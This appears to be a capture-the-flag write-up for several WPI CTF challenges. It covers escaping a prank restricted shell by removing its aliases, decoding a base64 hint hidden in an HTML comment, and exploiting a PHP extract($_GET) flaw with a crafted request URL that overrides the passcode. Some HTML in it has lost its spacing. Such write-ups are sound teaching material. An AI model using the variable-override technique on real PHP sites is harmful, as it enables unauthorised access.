$ ssh ctf@107.21.60.114 ctf@107.21.60.114's password: SuckMORE shell v1.0.1. Note: for POSIX support update to v1.1.0 suckmore>alias alias bash='sh' alias cat='sleep 1 && vim' alias cd='cal' alias cp='grep' alias dnf='' alias find='w' alias less='echo "We are suckMORE, not suckless"' alias ls='sleep 1' alias more='echo "SuckMORE shell, v1.0.1, (c) SuckMore Software, a division of WPI Digital Holdings Ltd."' alias nano='touch' alias pwd='uname' alias rm='mv /u/' alias sh='echo "Why would you ever want to leave suckmore shell?"' alias sl='ls' alias vi='touch' alias vim='touch' alias which='echo "Not Found"' suckmore>unalias -a suckmore>pwd / suckmore>echo /home/* /home/ctf suckmore>echo /home/ctf/* /home/ctf/flag suckmore>tee</home/ctf/flag WPI{bash_sucks0194342}
<html> <head> <title>WPI CTF</title> <linkrel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.1.1/css/bootstrap.min.css" integrity="sha384-WskhaSGFgHYWDcbwN70/dfYBj47jz9qbsMId/iRN3ewGhXQFZCSftd1LZCfmhktB" crossorigin="anonymous"> <linkhref=style.cssrel=stylesheet> </head> <body> <divclass="form"> <h1>GET a <imgsrc="flag.png"alt="Flag Pic"height="42"width="42">?</h1> <p> All you gotta do is guess the correct password? </p> <formaction="#"method="GET"> <p><inputtype="text"name="input"></p> <p><inputclass="button"type="submit"value="Enter"></p> <!-- SGV5IEdvdXRoYW0sIGRvbid0IGZvcmdldCB0byBibG9jayAvYXV0aC5waHAgYWZ0ZXIgeW91IHVwbG9hZCB0aGlzIGNoYWxsZW5nZSA7KQ== --> </form> <br> </div> </body> </html>
1 2
$ printf %s 'SGV5IEdvdXRoYW0sIGRvbid0IGZvcmdldCB0byBibG9jayAvYXV0aC5waHAgYWZ0ZXIgeW91IHVwbG9hZCB0aGlzIGNoYWxsZW5nZSA7KQ==' | base64 -d Hey Goutham, don't forget to block /auth.php after you upload this challenge ;)
extract($_GET); if (($input is detected)) { if ($input === get_contents($passcode)) { return $flag } else { echo "Invalid ... Please try again!" } } </code> </pre> </body> </html>
So I did http://getaflag.wpictf.xyz:31337/?input=1&passcode=/proc/sys/net/ipv4/ip_forward.
Why? because the content of /proc/sys/net/ipv4/ip_forward can only be 1 or 0, so it is easy to guess its content and so having $input === get_contents($passcode). Also extract($_GET); will convert all GET param to variables and so we are able to override $passcode.
Flag was WPI{1_l0v3_PHP} but there was a little troll:
1 2 3 4
<b>You did it, <ahref=https://bit.ly/IqT6zt>click here to get your flag</a></b></p><scripttype='text/javascript'> console.log('Never trust suspicious links'); console.log('Flag is WPI{1_l0v3_PHP}'); </script>
Let's base64 decode the encrypted file and store it in a new file.
1
$ cat random.txt| base64 -d > random.bin
Now let's decipher it:
1 2 3 4 5 6 7
$ openssl aes-256-cbc -d -in random.bin -out flag.txt -pass file:urandom.txt *** WARNING : deprecated key derivation used. Using -iter or -pbkdf2 would be better. $ cat flag.txt Being holy in our church means installing a wholly free operating system--GNU/Linux is a good choice--and not putting any non-free software on your computer. Join the Church of Emacs, and you too can be a saint! And lo, it came to pass, that the neophyte encountered the Beplattered One and humbly posed the question "Oh great master, is it a sin to use vi?" And St. IGNUcuis dist thus reply unto him, "No, my young hacker friend, it is not a sin. It is a penance." WPI{@11_Ur_d3v1c3s_r_b3l0ng_2_us}